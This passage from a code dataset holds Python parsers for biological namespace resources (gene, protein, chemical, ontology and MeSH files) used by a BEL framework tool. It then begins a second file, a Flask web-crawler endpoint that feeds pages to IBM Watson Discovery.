namespace/entrez-gene-ids-hmr.belns\"\"\"\n\n    def __init__(self, url):\n        super(EntrezGeneHistoryParser, self).__init__(url)\n        self.entrez_history = url\n\n    def parse(self):\n\n        entrez_history_headers = [\"tax_id\", \"GeneID\", \"Discontinued_GeneID\",\n                                  \"Discontinued_Symbol\", \"Discontinue_Date\"]\n\n        # dictionary for base gene info\n        history_csvr = csv.DictReader(gzip_to_text(self.entrez_history),\n                                      delimiter='\\t',\n                                      fieldnames=entrez_history_headers)\n\n        for row in history_csvr:\n            if row['tax_id'] in (\"9606\", \"10090\", \"10116\"):\n                yield row\n\n    def __str__(self):\n        return \"EntrezGeneHistory_Parser\"\n\n\nclass HGNCParser(Parser):\n    resourceLocation = 
\"\"\"http://resource.belframework.org/belframework/1.0/\n namespace/hgnc-approved-symbols.belns\"\"\"\n\n def __init__(self, url):\n super(HGNCParser, self).__init__(url)\n self.hgnc_file = url\n\n def parse(self):\n\n # use iso-8859-1 as default encoding.\n with open(self.hgnc_file, \"r\", encoding=\"iso-8859-1\") as hgncf:\n\n # Note that HGNC uses TWO columns named the same thing for Entrez\n # Gene ID. Currently we are not using these columns and it is not a\n # big deal, but in the future we could account for this by using\n # custom headers (like EntrezGeneInfo_Parser), or resolving to the\n # SECOND of the Entrez Gene ID columns.\n hgnc_csvr = csv.DictReader(hgncf, delimiter='\\t')\n\n for row in hgnc_csvr:\n yield row\n\n def __str__(self):\n return \"HGNC_Parser\"\n\n\nclass MGIParser(Parser):\n resourceLocation = \"\"\"http://resource.belframework.org/belframework/1.0/\n namespace/mgi-approved-symbols.belns\"\"\"\n\n def __init__(self, url):\n super(MGIParser, self).__init__(url)\n self.mgi_file = url\n\n def parse(self):\n with open(self.mgi_file, \"r\") as mgif:\n mgi_csvr = csv.DictReader(mgif, delimiter='\\t')\n\n for row in mgi_csvr:\n yield row\n\n def __str__(self):\n return \"MGI_Parser\"\n\n\nclass RGDParser(Parser):\n resourceLocation = \"\"\"http://resource.belframework.org/belframework/1.0/\n namespace/rgd-approved-symbols.belns\"\"\"\n\n def __init__(self, url):\n super(RGDParser, self).__init__(url)\n self.rgd_file = url\n\n def parse(self):\n with open(self.rgd_file, \"r\") as rgdf:\n # skip all the comment lines beginning with '#' and also the header.\n rgd_csvr = csv.DictReader(filter(lambda row:\n not row[0].startswith('#'), rgdf),\n delimiter='\\t')\n\n for row in rgd_csvr:\n yield row\n\n def __str__(self):\n return \"RGD_Parser\"\n\n\n# This class exists mainly as a way to break the iteration loop during parsing\n# of the SwissProt dataset if needed.\nclass GeneTypeError(Exception):\n def __init__(self, value):\n self.value = value\n def __str__(self):\n return repr(self.value)\n\n\nclass SwissProtParser(Parser):\n resourceLocation_accession_numbers = \"\"\"http://resource.belframework.org/\n belframework/1.0/namespace/swissprot-accession-numbers.belns\"\"\"\n resourceLocation_entry_names = \"\"\"http://resource.belframework.org/\n belframework/1.0/namespace/swissprot-entry-names.belns\"\"\"\n\n def __init__(self, url):\n super(SwissProtParser, self).__init__(url)\n self.sprot_file = url\n self.entries = {}\n self.accession_numbers = {}\n self.gene_ids = {}\n self.tax_ids = {'9606', '10090', '10116'}\n self.pro = '{http://uniprot.org/uniprot}protein'\n self.rec_name = '{http://uniprot.org/uniprot}recommendedName'\n self.full_name = '{http://uniprot.org/uniprot}fullName'\n self.short_name = '{http://uniprot.org/uniprot}shortName'\n self.alt_name = '{http://uniprot.org/uniprot}alternativeName'\n self.db_ref = '{http://uniprot.org/uniprot}dbReference'\n self.organism = '{http://uniprot.org/uniprot}organism'\n self.entry = '{http://uniprot.org/uniprot}entry'\n self.accession = '{http://uniprot.org/uniprot}accession'\n self.name = '{http://uniprot.org/uniprot}name'\n\n def parse(self):\n\n with gzip.open(self.sprot_file) as sprotf:\n# with open(self.sprot_file, 'rb') as sprotf:\n ctx = etree.iterparse(sprotf, tag=self.entry)\n\n for ev, e in ctx:\n temp_dict = {}\n n_dict = {}\n\n # stop evaluating if this entry is not in the Swiss-Prot dataset\n if e.get('dataset') != 'Swiss-Prot':\n e.clear()\n continue\n\n # stop evaluating if this entry is not for human, 
mouse, or rat\n org = e.find(self.organism)\n\n # use a custom exception to break to next iteration (e)\n # if tax ref is not found.\n try:\n for org_child in org:\n if org_child.tag == self.db_ref:\n # restrict by NCBI Taxonomy reference\n if org_child.get('id') not in self.tax_ids:\n e.clear()\n raise GeneTypeError(org_child.get('id'))\n else:\n # add NCBI Taxonomy and the id for the entry\n # to the dict\n temp_dict[org_child.get('type')] = \\\n org_child.get('id')\n except GeneTypeError:\n continue\n\n # get entry name, add it to the dict\n entry_name = e.find(self.name).text\n temp_dict['name'] = entry_name\n\n # get protein data, add recommended full and short names to dict\n protein = e.find(self.pro)\n\n for child in protein.find(self.rec_name):\n if child.tag == self.full_name:\n temp_dict['recommendedFullName'] = child.text\n if child.tag == self.short_name:\n temp_dict['recommendedShortName'] = child.text\n alt_shortnames = []\n alt_fullnames = []\n\n protein = e.find(self.pro)\n for altName in protein.findall(self.alt_name):\n for child in altName:\n if child.tag == self.full_name:\n alt_fullnames.append(child.text)\n if child.tag == self.short_name:\n alt_shortnames.append(child.text)\n\n temp_dict['alternativeFullNames'] = alt_fullnames\n temp_dict['alternativeShortNames'] = alt_shortnames\n\n # get all accessions\n entry_accessions = []\n for entry_accession in e.findall(self.accession):\n acc = entry_accession.text\n entry_accessions.append(acc)\n if acc in self.accession_numbers:\n self.accession_numbers[acc] = None\n else:\n self.accession_numbers[acc] = 1\n\n # add the array of accessions to the dict\n temp_dict[\"accessions\"] = entry_accessions\n\n # add dbReference type (human, rat, and mouse) and gene ids to\n # the dict\n type_set = ['GeneId', 'MGI', 'HGNC', 'RGD']\n for dbr in e.findall(self.db_ref):\n if dbr.get('type') in type_set:\n gene_id = dbr.get('id')\n if dbr.get('type') not in n_dict:\n n_dict[dbr.get('type')] = [gene_id]\n else:\n n_dict[dbr.get('type')].append(gene_id)\n temp_dict['dbReference'] = n_dict\n\n # clear the tree before next iteration\n e.clear()\n while e.getprevious() is not None:\n del e.getparent()[0]\n\n yield temp_dict\n\n def __str__(self):\n return 'SwissProt_Parser'\n\n\n# Helper function for AffyParser. This will save each of the downloaded\n# URLs and return the file pointer.\ndef get_data(url):\n # from url, download and save file\n REQ = urllib.request.urlopen(url)\n file_name = url.split('/')[-1]\n os.chdir('datasets/')\n with open(file_name,'wb') as f:\n f.write(REQ.read())\n os.chdir('../')\n return file_name\n\ndef filter_plus_print(row):\n return not row.startswith('#')\n\n\nclass AffyParser(Parser):\n\n def __init__(self, url):\n super(AffyParser, self).__init__(url)\n self.affy_file = url\n\n def parse(self):\n\n # the arrays we are concerned with\n array_names = ['HG-U133A', 'HG-U133B', 'HG-U133_Plus_2', 'HG_U95Av2',\n 'MG_U74A', 'MG_U74B', 'MG_U74C', 'MOE430A', 'MOE430B',\n 'Mouse430A_2', 'Mouse430_2', 'RAE230A', 'RAE230B',\n 'Rat230_2']\n\n urls = []\n with open(self.affy_file, 'rb') as affyf:\n ctx = etree.iterparse(affyf, events=('start', 'end'))\n\n # This is probably not the best way to traverse this tree. 
Look at\n # the lxml.etree API more closely for possible implementations when\n # refactoring\n # NOTES - put some debugging in here to see how this is parsing,\n # may be a better way to parse (like using diff events).\n for ev, e in ctx:\n # iterate the Array elements\n for n in e.findall('Array'):\n name = n.get('name')\n if name in array_names:\n # iterate Annotation elements\n for child in n:\n if child.get('type') == 'Annot CSV':\n # iterate File elements\n for g_child in child:\n # get the URL and add to the list\n for gg_child in g_child:\n urls.append(gg_child.text)\n\n # iterate over the list of URLs returned from the Affy XML feed\n for link in urls:\n affy_reader = {}\n\n # get_data() downloads the file, saves it as a .csv.zip, and\n # returns a pointer to the file.\n n = get_data(link)\n z = zipfile.ZipFile('datasets/'+n, 'r')\n\n # only want the .csv from the archive (also contains a .txt)\n for name in z.namelist():\n if '.csv' in name:\n if self.verbose:\n print('\\tExtracting - ' +name)\n # wrap in a TextIOWrapper. otherwise it returns bytes.\n affy_reader = csv.DictReader(filter(lambda x:\n not x.startswith('#'),\n io.TextIOWrapper(z.open(name))),\n delimiter=',')\n\n for x in affy_reader:\n yield x\n\n def __str__(self):\n return 'Affy_Parser'\n\nclass Gene2AccParser(Parser):\n\n def __init__(self, url):\n super(Gene2AccParser, self).__init__(url)\n self.gene2acc_file = url\n\n def parse(self):\n\n # would like to have DictReader handle this, but need a way to\n # deal with the special case of the first value beginning with\n # a hashtag. i.e. #Format: <-- is NOT a column header.\n column_headers = ['tax_id', 'GeneID', 'status',\n 'RNA nucleotide accession.version',\n 'RNA nucleotide gi', 'protein accession.version',\n 'protein gi', 'genomic nucleotide accession.version',\n 'genomic nucleotide gi',\n 'start position on the genomic accession',\n 'end position on the genomic accession',\n 'orientation', 'assembly',\n 'mature peptide accession.version',\n 'mature peptide gi', 'Symbol']\n\n g2a_reader = csv.DictReader(gzip_to_text(self.gene2acc_file), delimiter='\\t',\n fieldnames=column_headers)\n\n for row in g2a_reader:\n yield row\n\n def __str__(self):\n return 'Gene2Acc_Parser'\n\nclass BELNamespaceParser(Parser):\n\n def __init__(self):\n self.old_files = 'http://resource.belframework.org./belframework/1.0/index.xml'\n self.anno_def = '{http://www.belscript.org/schema/annotationdefinitions}annotationdefinitions'\n self.namespace = '{http://www.belscript.org/schema/namespace}namespace'\n self.namespaces = '{http://www.belscript.org/schema/namespaces}namespaces'\n\n def parse(self):\n\n tree = etree.parse(self.old_files)\n\n # xpath will return all elements under this namespace (list of bel namespace urls)\n urls = tree.xpath('//*[local-name()=\"namespace\"]/@idx:resourceLocation',\n namespaces={'xsi': 'http://www.w3.org/2001/XMLSchema-instance',\n 'idx' : 'http://www.belscript.org/schema/index'})\n\n for url in urls:\n yield url\n\n def __str__(self):\n return 'BELNamespace_Parser'\n\n\nclass BELEquivalenceParser(Parser):\n\n def __init__(self):\n self.old_files = 'http://resource.belframework.org./belframework/1.0/index.xml'\n self.anno_def = '{http://www.belscript.org/schema/annotationdefinitions}annotationdefinitions'\n self.namespace = '{http://www.belscript.org/schema/namespace}namespace'\n self.namespaces = '{http://www.belscript.org/schema/namespaces}namespaces'\n\n def parse(self):\n\n tree = etree.parse(self.old_files)\n\n # xpath will return all elements 
under this namespace (list of bel equivalence urls)\n        urls = tree.xpath('//*[local-name()=\"equivalence\"]/@idx:resourceLocation',\n                          namespaces={'xsi': 'http://www.w3.org/2001/XMLSchema-instance',\n                                      'idx' : 'http://www.belscript.org/schema/index'})\n\n        for url in urls:\n            yield url\n\n    def __str__(self):\n        return 'BELEquivalence_Parser'\n\n\nclass BELAnnotationsParser(Parser):\n\n    def __init__(self):\n        self.old_files = 'http://resource.belframework.org./belframework/1.0/index.xml'\n\n    def parse(self):\n\n        tree = etree.parse(self.old_files)\n\n        # xpath will return all elements under this namespace (list of bel annotation urls)\n        urls = tree.xpath('//*[local-name()=\"annotationdefinition\"]/@idx:resourceLocation',\n                          namespaces={'xsi': 'http://www.w3.org/2001/XMLSchema-instance',\n                                      'idx' : 'http://www.belscript.org/schema/index'})\n\n        for url in urls:\n            yield url\n\n    def __str__(self):\n        return 'BELAnnotations_Parser'\n\n# This one uses iterparse(), much faster than xpath on the\n# bigger .owl file.\nclass CHEBIParser(Parser):\n\n    def __init__(self, url):\n        super(CHEBIParser, self).__init__(url)\n        self.chebi_file = url\n        self.classy = '{http://www.w3.org/2002/07/owl#}Class'\n        self.label = '{http://www.w3.org/2000/01/rdf-schema#}label'\n        self.altId = '{http://purl.obolibrary.org/obo#}altId'\n        self.synonym = '{http://purl.obolibrary.org/obo#}Synonym'\n\n    def parse(self):\n\n        with open(self.chebi_file, 'rb') as cf:\n            tree = etree.iterparse(cf, tag=self.classy)\n            for event, elem in tree:\n                if len(elem.values()) != 0:\n                    chebi_dict = {}\n                    synonyms = set()\n                    alt_ids = set()\n                    name = ''\n                    vals = elem.values()\n                    chebi_dict['primary_id'] = vals[0].split('CHEBI_')[1]\n                    children = elem.getchildren()\n                    for child in children:\n                        if child.tag == self.label:\n                            name = child.text\n                        if child.tag == self.altId:\n                            alt_ids.add(child.text.split(':')[1])\n                        if child.tag == self.synonym:\n                            synonyms.add(child.text)\n                    chebi_dict['name'] = name\n                    chebi_dict['alt_ids'] = alt_ids\n                    chebi_dict['synonyms'] = synonyms\n\n                    yield chebi_dict\n\n    def __str__(self):\n        return 'CHEBI_Parser'\n\n\nclass PubNamespaceParser(Parser):\n\n    def __init__(self, url):\n        super(PubNamespaceParser, self).__init__(url)\n        self.pub_file = url\n\n    def parse(self):\n        column_headers = ['pubchem_id', 'synonym']\n\n        with open(self.pub_file, 'r') as fp:\n            pub_reader = csv.DictReader(fp, delimiter='\\t',\n                                        fieldnames=column_headers)\n\n            for row in pub_reader:\n                yield row\n\n    def __str__(self):\n        return 'PubNamespace_Parser'\n\n\nclass PubEquivParser(Parser):\n\n    def __init__(self, url):\n        super(PubEquivParser, self).__init__(url)\n        self.cid_file = url\n\n    def parse(self):\n\n        column_headers = ['PubChem SID', 'Source', 'External ID', 'PubChem CID']\n        cid_reader = csv.DictReader(gzip_to_text(self.cid_file), delimiter='\\t',\n                                    fieldnames=column_headers)\n\n        for row in cid_reader:\n            yield row\n\n    def __str__(self):\n        return 'PubEquiv_Parser'\n\n\nclass SCHEMParser(Parser):\n\n    def __init__(self, url):\n        super(SCHEMParser, self).__init__(url)\n        self.schem_file = url\n\n    def parse(self):\n        isFalse = True\n        with open(self.schem_file, 'r') as fp:\n            for line in fp.readlines():\n                if '[Values]' not in line and isFalse:\n                    continue\n                elif '[Values]' in line:\n                    isFalse = False\n                    continue\n                else:\n                    schem_id = line.split('|')[0]\n                    yield {'schem_id' : schem_id }\n\n    def __str__(self):\n        return 'SCHEM_Parser'\n\n\nclass SDISParser(Parser):\n\n    def __init__(self, url):\n        
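# SDIS files use the same '[Values]'-delimited layout as SCHEM files,\n        # so this parser mirrors SCHEMParser above.\n        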
super(SDISParser, self).__init__(url)\n self.sdis_file = url\n\n def parse(self):\n isFalse = True\n with open(self.sdis_file, 'r') as fp:\n for line in fp.readlines():\n if '[Values]' not in line and isFalse:\n continue\n elif '[Values]' in line:\n isFalse = False\n continue\n else:\n sdis_id = line.split('|')[0]\n yield {'sdis_id' : sdis_id }\n\n def __str__(self):\n return 'SDIS_Parser'\n\n\nclass SCHEMtoCHEBIParser(Parser):\n\n def __init__(self, url):\n super(SCHEMtoCHEBIParser, self).__init__(url)\n self.schem_to_chebi = url\n\n def parse(self):\n\n column_headers = ['SCHEM_term', 'CHEBIID', 'CHEBI_name']\n\n with open(self.schem_to_chebi, 'r') as fp:\n rdr = csv.DictReader(fp, delimiter='\\t', fieldnames=column_headers)\n\n for row in rdr:\n yield row\n\n def __str__(self):\n return 'SCHEMtoCHEBI_Parser'\n\n\nclass SDIStoDOParser(Parser):\n\n def __init__(self, url):\n super(SDIStoDOParser, self).__init__(url)\n self.sdis_to_do = url\n\n def parse(self):\n\n column_headers = ['SDIS_term', 'DOID', 'DO_name']\n\n with open(self.sdis_to_do, 'r') as fp:\n rdr = csv.DictReader(fp, delimiter='\\t', fieldnames=column_headers)\n\n for row in rdr:\n yield row\n\n def __str__(self):\n return 'SDIStoDO_Parser'\n\n\nclass GOBPParser(Parser):\n\n def __init__(self, url):\n super(GOBPParser, self).__init__(url)\n self.go_file = url\n\n def parse(self):\n\n # parse xml tree using lxml\n parser = etree.XMLParser(ns_clean=True, recover=True, encoding='UTF-8')\n with gzip.open(self.go_file, 'r') as go:\n root = etree.parse(go, parser)\n bp_terms = root.xpath(\"/obo/term [namespace = 'biological_process' and not(is_obsolete)]\")\n\n # iterate the NON-OBSOLETE biological_process terms\n for t in bp_terms:\n bp_termid = t.find('id').text\n bp_termname = t.find('name').text\n if t.findall('alt_id') is not None:\n bp_altids = [x.text for x in t.findall('alt_id')]\n else:\n bp_altids = False\n yield { 'termid' : bp_termid, 'termname' : bp_termname,\n 'alt_ids' : bp_altids }\n\n def obsolete_parse(self):\n\n # parse xml tree using lxml\n parser = etree.XMLParser(ns_clean=True, recover=True, encoding='UTF-8')\n with gzip.open(self.go_file, 'r') as go:\n root = etree.parse(go, parser)\n bp_terms = root.xpath(\"/obo/term [namespace = 'biological_process' and is_obsolete]\")\n\n # iterate the OBSOLETE biological_process terms\n for t in bp_terms:\n bp_termid = t.find('id').text\n bp_termname = t.find('name').text\n if t.findall('alt_id') is not None:\n bp_altids = [x.text for x in t.findall('alt_id')]\n else:\n bp_altids = False\n yield { 'termid' : bp_termid, 'termname' : bp_termname,\n 'alt_ids' : bp_altids }\n\n\n def __str__(self):\n return 'GOBP_Parser'\n\n\nclass GOCCParser(Parser):\n\n def __init__(self, url):\n super(GOCCParser, self).__init__(url)\n self.go_file = url\n self.mesh_file = 'meshcs_to_gocc.csv'\n\n def parse(self):\n\n # initialize empty dictionaries using tuple assignment\n cc_parents, accession_dict, term_dict = {}, {}, {}\n\n # parse xml tree using lxml\n parser = etree.XMLParser(ns_clean=True, recover=True, encoding='UTF-8')\n root = etree.parse(self.go_file, parser)\n cc_terms = root.xpath(\"/obo/term [namespace = 'cellular_component' and not(is_obsolete)]\")\n\n # iterate the NON-OBSOLETE complex terms to build parent dictionary\n for t in cc_terms:\n cc_termid = t.find(\"id\").text\n cc_parent_ids = [isa.text for isa in t.findall(\"is_a\")]\n cc_parents[cc_termid] = cc_parent_ids\n\n for t in cc_terms:\n cc_termid = t.find('id').text\n cc_termname = t.find('name').text\n 
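# climb the is_a ancestry: any term whose ancestors include GO:0032991\n            # is flagged as a complex below\n            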
cc_parent_stack = list(cc_parents[cc_termid])  # copy: pop() below must not drain the shared parent lists\n            if t.findall('alt_id') is not None:\n                cc_altids = [x.text for x in t.findall('alt_id')]\n            else:\n                cc_altids = False\n            complex = False\n\n            if cc_termid == \"GO:0032991\":\n                complex = True\n            elif t.find(\"is_root\") is not None:\n                complex = False\n            else:\n                while len(cc_parent_stack) > 0:\n                    cc_parent_id = cc_parent_stack.pop()\n\n                    if cc_parent_id == \"GO:0032991\":\n                        complex = True\n                        break\n\n                    if cc_parent_id in cc_parents:\n                        cc_parent_stack.extend(cc_parents[cc_parent_id])\n\n            yield { 'termid' : cc_termid, 'termname' : cc_termname,\n                    'altids' : cc_altids, 'complex' : complex }\n\n    def obsolete_parse(self):\n\n        # initialize empty dictionaries using tuple assignment\n        cc_parents, accession_dict, term_dict = {}, {}, {}\n\n        # parse xml tree using lxml\n        parser = etree.XMLParser(ns_clean=True, recover=True, encoding='UTF-8')\n        root = etree.parse(self.go_file, parser)\n        cc_terms = root.xpath(\"/obo/term [namespace = 'cellular_component' and is_obsolete]\")\n\n        # iterate the OBSOLETE complex terms to build parent dictionary\n        for t in cc_terms:\n            cc_termid = t.find(\"id\").text\n            cc_parent_ids = [isa.text for isa in t.findall(\"is_a\")]\n            cc_parents[cc_termid] = cc_parent_ids\n\n        for t in cc_terms:\n            cc_termid = t.find('id').text\n            cc_termname = t.find('name').text\n            cc_parent_stack = list(cc_parents[cc_termid])  # copy, as in parse() above\n            if t.findall('alt_id') is not None:\n                cc_altids = [x.text for x in t.findall('alt_id')]\n            else:\n                cc_altids = False\n            complex = False\n\n            if cc_termid == \"GO:0032991\":\n                complex = True\n            elif t.find(\"is_root\") is not None:\n                complex = False\n            else:\n                while len(cc_parent_stack) > 0:\n                    cc_parent_id = cc_parent_stack.pop()\n\n                    if cc_parent_id == \"GO:0032991\":\n                        complex = True\n                        break\n\n                    if cc_parent_id in cc_parents:\n                        cc_parent_stack.extend(cc_parents[cc_parent_id])\n\n            yield { 'termid' : cc_termid, 'termname' : cc_termname,\n                    'altids' : cc_altids, 'complex' : complex }\n\n    def __str__(self):\n        return 'GOCC_Parser'\n\n\nclass MESHParser(Parser):\n\n    def __init__(self, url):\n        super(MESHParser, self).__init__(url)\n        self.mesh_file = url\n\n    def parse(self):\n\n        # ui - unique identifier / mh - mesh header\n        # mn - tree # / st - semantic type\n        ui = ''\n        mh = ''\n        mns = set()\n        sts = set()\n        synonyms = set()\n        firstTime = True\n        with open(self.mesh_file, 'r') as fp:\n            for line in fp.readlines():\n                if line.startswith('MH ='):\n                    mh = line.split('=')[1].strip()\n                elif line.startswith('UI ='):\n                    ui = line.split('=')[1].strip()\n                elif line.startswith('MN ='):\n                    mn = line.split('=')[1].strip()\n                    mns.add(mn)\n                elif line.startswith('ST ='):\n                    st = line.split('=')[1].strip()\n                    sts.add(st)\n                elif line.startswith('PRINT ENTRY ='):\n                    entry = line.split('=')[1].strip()\n                    if '|EQV|' in line:\n                        entries = entry.split('|')\n                        last = entries[-1]\n                        num_syns = last.count('a')\n                        while num_syns > 0:\n                            num_syns = num_syns - 1\n                            s = entries[num_syns]\n                            synonyms.add(s.strip())\n                    else:\n                        if '|' not in entry:\n                            synonyms.add(entry)\n                elif line.startswith('ENTRY ='):\n                    entry = line.split('=')[1].strip()\n                    if '|EQV|' in line:\n                        entries = entry.split('|')\n                        last = entries[-1]\n                        num_syns = last.count('a')\n                        while num_syns > 0:\n                            num_syns = num_syns - 1\n                            s = entries[num_syns]\n                            synonyms.add(s.strip())\n                    else:\n                        if '|' not in entry:\n                            synonyms.add(entry)\n                elif line.startswith('*NEWRECORD'):\n                    # file begins with *NEWRECORD so skip that one (dont yield)\n                    if firstTime:\n                        firstTime = False\n                        
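# nothing has been accumulated yet for the very first record marker\n                        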
continue\n else:\n\n yield { 'ui' : ui, 'mesh_header' : mh,\n 'mns' : mns, 'sts' : sts,\n 'synonyms' : synonyms }\n ui = ''\n mh = ''\n mns = set()\n sts = set()\n synonyms = set()\n\n def __str__(self):\n return 'MESH_Parser'\n\n\nclass SwissWithdrawnParser(Parser):\n\n def __init__(self, url):\n super(SwissWithdrawnParser, self).__init__(url)\n self.s_file = url\n\n def parse(self):\n\n with open(self.s_file, 'r') as fp:\n marker = False\n for line in fp.readlines():\n if '____' in line:\n marker = True\n continue\n if marker is False:\n continue\n\n yield {'accession' : line.strip()}\n\n def __str__(self):\n return 'SwissWithdrawn_Parser'\n\n\nclass MESHChangesParser(Parser):\n\n def __init__(self, url):\n super(MESHChangesParser, self).__init__(url)\n self.mesh_file = url\n\n def parse(self):\n\n with open(self.mesh_file, 'r') as fp:\n for line in fp.readlines():\n if 'MH OLD =' in line:\n mh_old = line.split('= ')[1]\n if '#' in mh_old:\n mh_old = mh_old.split(' #')[0]\n elif '[' in mh_old:\n mh_old = mh_old.split(' [')[0]\n if 'MH NEW =' in line:\n mh_new = line.split('= ')[1]\n if '#' in mh_new:\n mh_new = mh_new.split(' #')[0]\n elif '[' in mh_new:\n mh_new = mh_new.split(' [')[0]\n yield { 'mh_old' : mh_old.strip(), 'mh_new' : mh_new.strip() }\n mh_old = ''\n mh_new = ''\n\n def __str__(self):\n return 'MESHChanges_Parser'\n\n\ndef is_deprecated(child_list):\n dep = False\n deprecated = '{http://www.w3.org/2002/07/owl#}deprecated'\n for child in child_list:\n if child.tag == deprecated and child.text == 'true':\n dep = True\n return dep\n\n\n# custom exception to break out of the loop when an deprecated\n# term has been seen.\nclass DeprecatedTermException(Exception):\n def __init__(self, value):\n self.value = value\n def __str__(self):\n return repr(self.value)\n\n# excludes deprecated terms which are not included in the namespace\nclass DOParser(Parser):\n\n def __init__(self, url):\n super(DOParser, self).__init__(url)\n self.do_file = url\n self.classy = '{http://www.w3.org/2002/07/owl#}Class'\n self.deprecated = '{http://www.w3.org/2002/07/owl#}deprecated'\n self.dbxref = '{http://www.geneontology.org/formats/oboInOwl#}hasDbXref'\n self.id = '{http://www.geneontology.org/formats/oboInOwl#}id'\n self.label = '{http://www.w3.org/2000/01/rdf-schema#}label'\n\n def parse(self):\n\n with open(self.do_file, 'rb') as df:\n tree = etree.iterparse(df, tag=self.classy)\n for event, elem in tree:\n do_dict = {}\n dbxrefs = []\n name = ''\n id = ''\n try:\n if len(elem.values()) != 0:\n children = elem.getchildren()\n if is_deprecated(children):\n raise DeprecatedTermException(children)\n else:\n for child in children:\n if child.tag == self.dbxref:\n dbxrefs.append(child.text)\n elif child.tag == self.id:\n id = child.text.split(':')[1]\n elif child.tag == self.label:\n name = child.text\n do_dict['name'] = name\n do_dict['id'] = id\n do_dict['dbxrefs'] = dbxrefs\n yield do_dict\n except DeprecatedTermException:\n continue\n\n def __str__(self):\n return 'DO_Parser'\n\n\n# includes deprecated terms (for change-log)\nclass DODeprecatedParser(Parser):\n\n def __init__(self, url):\n super(DODeprecatedParser, self).__init__(url)\n self.do_file = url\n self.classy = '{http://www.w3.org/2002/07/owl#}Class'\n self.deprecated = '{http://www.w3.org/2002/07/owl#}deprecated'\n self.dbxref = '{http://www.geneontology.org/formats/oboInOwl#}hasDbXref'\n self.id = '{http://www.geneontology.org/formats/oboInOwl#}id'\n self.label = '{http://www.w3.org/2000/01/rdf-schema#}label'\n\n def parse(self):\n\n 
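# unlike DOParser above, deprecated classes are kept here and exposed\n        # via the 'deprecated' flag so change-logs can track removals\n        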
with open(self.do_file, 'rb') as df:\n tree = etree.iterparse(df, tag=self.classy)\n for event, elem in tree:\n do_dep_dict = {}\n dbxrefs = []\n name = ''\n id = ''\n dep = False\n if len(elem.values()) != 0:\n children = elem.getchildren()\n for child in children:\n if child.tag == self.dbxref:\n dbxrefs.append(child.text)\n elif child.tag == self.id:\n id = child.text.split(':')[1]\n elif child.tag == self.label:\n name = child.text\n elif child.tag == self.deprecated:\n dep = True\n do_dep_dict['name'] = name\n do_dep_dict['id'] = id\n do_dep_dict['dbxrefs'] = dbxrefs\n do_dep_dict['deprecated'] = dep\n yield do_dep_dict\n\n def __str__(self):\n return 'DODeprecated_Parser'\n","sub_path":"parsers.py","file_name":"parsers.py","file_ext":"py","file_size_in_byte":36278,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"24"} +{"seq_id":"429887903","text":"import datetime\nimport json\nimport os\nimport requests\nimport time\nfrom bs4 import BeautifulSoup\nfrom dotenv import load_dotenv\nfrom flask import jsonify\nfrom flask import request\nfrom ibm_watson import DiscoveryV1\n\nfrom server import app\nfrom server.routes import prometheus\nfrom server.config import db\nfrom urllib.parse import urlparse\n\n# Max crawl depth\nmax_depth = 1\n\n# Create array to store URLs that we have already crawled\ncrawled_urls = []\n#new_urls = []\n\n# Initialize the Discovery client\n#\nload_dotenv()\nDISCOVERY_COLLECTION_ID = os.environ.get('DISCOVERY_COLLECTION_ID')\nDISCOVERY_ENVIRONMENT_ID = os.environ.get('DISCOVERY_ENVIRONMENT_ID')\n\ndiscovery = None\nif DISCOVERY_COLLECTION_ID and DISCOVERY_ENVIRONMENT_ID:\n discovery = DiscoveryV1(version='2020-12-08')\n\n\n@app.route(\"/api/v1/crawlme\", methods=['POST'])\n@prometheus.track_requests\ndef crawlme():\n print(\"I'm in the crawlme function!\")\n \"\"\"crawlme url route\"\"\"\n crawl_this = request.get_json(force=True)\n print(\"INPUT:\", crawl_this)\n \n # Check if url=pause; workaround for Assistant pauses not working with SMS with Twilio integration\n if crawl_this.get('url')=='pause':\n print(\"Sleeping...\")\n # Wait for 6 seconds\n time.sleep(6)\n print(\"Slept for 6 seconds\")\n\n else:\n # TODO: queue these and run with threading\n crawl_url(crawl_this.get('url'), datetime.datetime.now(), depth=0)\n\n state = {\"status\": \"Accepted\"}\n return jsonify(state), 202\n\n\ndef crawl_url(url, posted, depth=0, root_url=None):\n new_urls = []\n print(\"url coming into crawl_url:\", url)\n if \"http\" not in url:\n url = \"https://\" + url\n print(\"new url after adding https (if needed):\", url)\n\n if ' ' in url:\n url = url.replace(' ', '')\n print(\"new url after removing spaces:\", url)\n \n root_url = root_url or url\n \n # if db.is_crawled(url):\n if url in crawled_urls:\n print(\"Skipping already crawled url:\", url)\n return\n crawled_urls.append(url)\n\n # filter out urls that end in .png, .js, .css\n end_url = os.path.basename(url)\n print(\"url basename:\", end_url)\n\n if end_url.endswith(('.png', '.js', '.css', '.jpg', '.aspx', '.php', '.jsp', '.php', '.rss', '.ashx', '.ece', '.mp3', '.mp4', '.ico')):\n print('skipping urls with this ending:', url)\n return\n\n try:\n page = requests.get(url)\n except Exception as e:\n print(e)\n return\n\n db.insert_crawl_me(\n {\n 'URL': url,\n 'PARENT_URL': root_url,\n 'POSTED': posted,\n 'DEPTH': depth,\n 'CRAWLED': datetime.datetime.now(),\n 'STATUS': page.status_code\n }\n )\n\n soup = BeautifulSoup(page.content, 'lxml')\n send_to_discovery(soup.prettify(), 
url)\n    \n    # Check for a client-side redirect URL\n    redirect = soup.find('meta',attrs={'http-equiv':'refresh'})\n    if redirect:\n        wait, text = redirect[\"content\"].split(\";\", 1)\n        if text.strip().lower().startswith(\"url=\"):\n            redirect_url = text.strip()[4:]\n            print('redirect_url = ', redirect_url)\n            crawl_url(redirect_url, posted, depth, root_url) \n\n    if depth < max_depth:\n        depth += 1\n        # recursive crawl...\n        # extract links from 'href' and 'src'\n        new_links = [\n            item['href'] if item.get('href') is not None else item['src']\n            for item in soup.select('[href^=\"http\"], [src^=\"http\"]')\n        ]\n\n        for x in new_links:\n            modified_link = x.split('?')[0]\n            new_urls.append(modified_link)\n        print('All URLs found: ', new_urls)\n        \n        for i in new_urls:\n            crawl_url(i, posted, depth, root_url)\n\ndef send_to_discovery(text_io, url):\n\n    if not discovery:\n        print(\"---> Skipping Discovery feed <--- (not configured)\")\n        return\n    \n    # use url domain-path as file name, joining segments with a literal '\\\\/'\n    domain = urlparse(url).netloc\n    path = urlparse(url).path.split(\"/\")\n    filename = str(domain)\n    if path:\n        for i in range(1, len(path)):\n            filename = filename + \"\\\\/\" + path[i]\n    print('filename:', filename)\n\n    # output_file = os.path.join(url_as_string + suffix)\n\n    add_doc = discovery.add_document(\n        environment_id=DISCOVERY_ENVIRONMENT_ID,\n        